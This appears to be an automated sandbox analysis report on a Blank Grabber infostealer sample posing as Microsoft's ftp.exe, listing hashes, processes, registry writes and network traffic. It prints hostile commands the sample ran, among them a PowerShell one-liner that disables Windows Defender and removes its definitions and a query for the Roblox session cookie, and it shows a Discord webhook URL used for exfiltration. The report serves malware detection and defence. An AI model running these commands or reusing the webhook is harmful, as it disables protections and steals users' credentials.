File name: | Built.exe |
Full analysis: | https://app.any.run/tasks/65247d60-21c8-4ce4-8f3f-dc1ffef8a2f7 |
Verdict: | Malicious activity |
Threats: | Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks. |
Analysis date: | July 05, 2025, 22:23:26 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.microsoft.portable-executable |
File info: | PE32+ executable (GUI) x86-64, for MS Windows, 7 sections |
MD5: | 7FD687A278A4FB4A322D789B70D9CFB8 |
SHA1: | 2367D5682E08186FDB9E381DE8A73DB863E37D90 |
SHA256: | 5F80B7AC2383580A39A8C2E4F1965A9A6F76214CFDF7426B187539584CBBCF8F |
SSDEEP: | 98304:+C3CpWXh6A35Yp2mDB4K6qFtM4+EFovlPmRSvddzdzoqpGysfbXf+RsYVsncRkmp:xJy44a+CH7qXf4hwljdHt7e |
.exe | | | Win64 Executable (generic) (87.3) |
---|---|---|
.exe | | | Generic Win/DOS Executable (6.3) |
.exe | | | DOS Executable Generic (6.3) |
MachineType: | AMD AMD64 |
---|---|
TimeStamp: | 2025:07:05 22:19:14+00:00 |
ImageFileCharacteristics: | Executable, Large address aware |
PEType: | PE32+ |
LinkerVersion: | 14.43 |
CodeSize: | 174592 |
InitializedDataSize: | 96768 |
UninitializedDataSize: | - |
EntryPoint: | 0xd0d0 |
OSVersion: | 6 |
ImageVersion: | - |
SubsystemVersion: | 6 |
Subsystem: | Windows GUI |
FileVersionNumber: | 10.0.19041.1 |
ProductVersionNumber: | 10.0.19041.1 |
FileFlagsMask: | 0x003f |
FileFlags: | (none) |
FileOS: | Windows NT 32-bit |
ObjectFileType: | Executable application |
FileSubtype: | - |
LanguageCode: | English (U.S.) |
CharacterSet: | Unicode |
CompanyName: | Microsoft Corporation |
FileDescription: | File Transfer Program |
FileVersion: | 10.0.19041.1 (WinBuild.160101.0800) |
InternalName: | ftp.exe |
LegalCopyright: | © Microsoft Corporation. All rights reserved. |
OriginalFileName: | ftp.exe |
ProductName: | Microsoft® Windows® Operating System |
ProductVersion: | 10.0.19041.1 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
424 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1068 | powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1156 | C:\WINDOWS\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" | C:\Windows\System32\cmd.exe | — | Built.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1180 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1232 | powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1328 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1328 | C:\WINDOWS\system32\cmd.exe /c "systeminfo" | C:\Windows\System32\cmd.exe | — | Built.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1336 | C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" | C:\Windows\System32\cmd.exe | — | Built.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1336 | wmic path win32_VideoController get name | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1480 | wmic computersystem get totalphysicalmemory | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (2992) Built.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib |
Operation: | write | Name: | 1280x720x32(BGR 0) |
Value: 31,31,31,31 | |||
(PID) Process: | (8104) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
Operation: | write | Name: | SessionIdHigh |
Value: 31190523 | |||
(PID) Process: | (8104) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
Operation: | write | Name: | SessionIdLow |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_bz2.pyd | executable | |
MD5:7727659BB076D34CF0F0AD1C1FC968E6 | SHA256:B9A2152A844FB58FB294DC33EFD3BD2C266DEF470BFE4B4EDACFB75DD2E3ECED | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\VCRUNTIME140.dll | executable | |
MD5:862F820C3251E4CA6FC0AC00E4092239 | SHA256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153 | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_queue.pyd | executable | |
MD5:051B0B941192073345D52298F0129B1F | SHA256:04CA88870ADE6C654490268D93360A61965E8CA799F2D52F6C99948B317BDE4D | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_ctypes.pyd | executable | |
MD5:9527B566DDA0B94F93F6DEF63BAAC6BB | SHA256:456C82D5B49AF25839A62E933794DFEC3D2AFDEF10D23A81FAD94B53B488FCC0 | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_sqlite3.pyd | executable | |
MD5:9BF44FB475F1732DF8C14B323CC5EC58 | SHA256:47EB79D84017ED5C4933622166DC0F003A59FF5556998F23385BE4D6C06B165A | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_hashlib.pyd | executable | |
MD5:69DA0E0688C8D2B1B6801E63053C3412 | SHA256:12332EB2C681511BC99BFF5A9B14D935933585199F10E57C0F37EBDAA6519ECE | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_lzma.pyd | executable | |
MD5:7A4DAD239486B02FF5106141D7ABA3A7 | SHA256:10856DBFD8C956E24ED04F6D533B8C03A2131A99F3AE427FACD7BEE9AD98802A | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_overlapped.pyd | executable | |
MD5:064D1F8509569CD5E656472D5ACC336E | SHA256:C2BDD26FEC75AF0B36F43607F8B1B27A13C4CD0864CA095E9A0C2EBB173F79AF | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_multiprocessing.pyd | executable | |
MD5:A5571C799D57313B0D4DB4ACB1C835D4 | SHA256:08653E4E3A8709AF86B8EBCDBA2B2C133F43856281112F44C8626ECC99B9E92B | |||
4828 | Built.exe | C:\Users\admin\AppData\Local\Temp\_MEI48282\_socket.pyd | executable | |
MD5:301875ACE6D58AB5737871A14C163A74 | SHA256:B3895E8D9389DC883EF05898D3E3E49BADC6D5E6A9433EA6CA315E2513AD88AF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2992 | Built.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | — | — | whitelisted |
— | — | GET | 204 | 142.250.185.67:443 | https://gstatic.com/generate_204 | unknown | — | — | — |
2992 | Built.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json/?fields=225545 | unknown | — | — | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | POST | 404 | 162.159.137.232:443 | https://discord.com/api/webhooks/1391181249309048863/DX6K9950IVs1ZcdYvFPaq3RbSg7fVcMHyxX11RP8ARUx92O4Dcbf7iTpVLyAix_WYz58 | unknown | binary | 45 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1268 | svchost.exe | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
5944 | MoUsoCoreWorker.exe | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
— | — | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
5944 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
6024 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1268 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
blank-nbkxw.in |
| unknown |
ip-api.com |
| whitelisted |
gstatic.com |
| whitelisted |
discord.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
— | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ip-api.com |
— | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
— | — | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
— | — | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
— | — | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ip-api.com |
— | — | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
— | — | Misc activity | ET INFO Discord Chat Service Domain in DNS Lookup (discord .com) |
— | — | A Network Trojan was detected | STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check |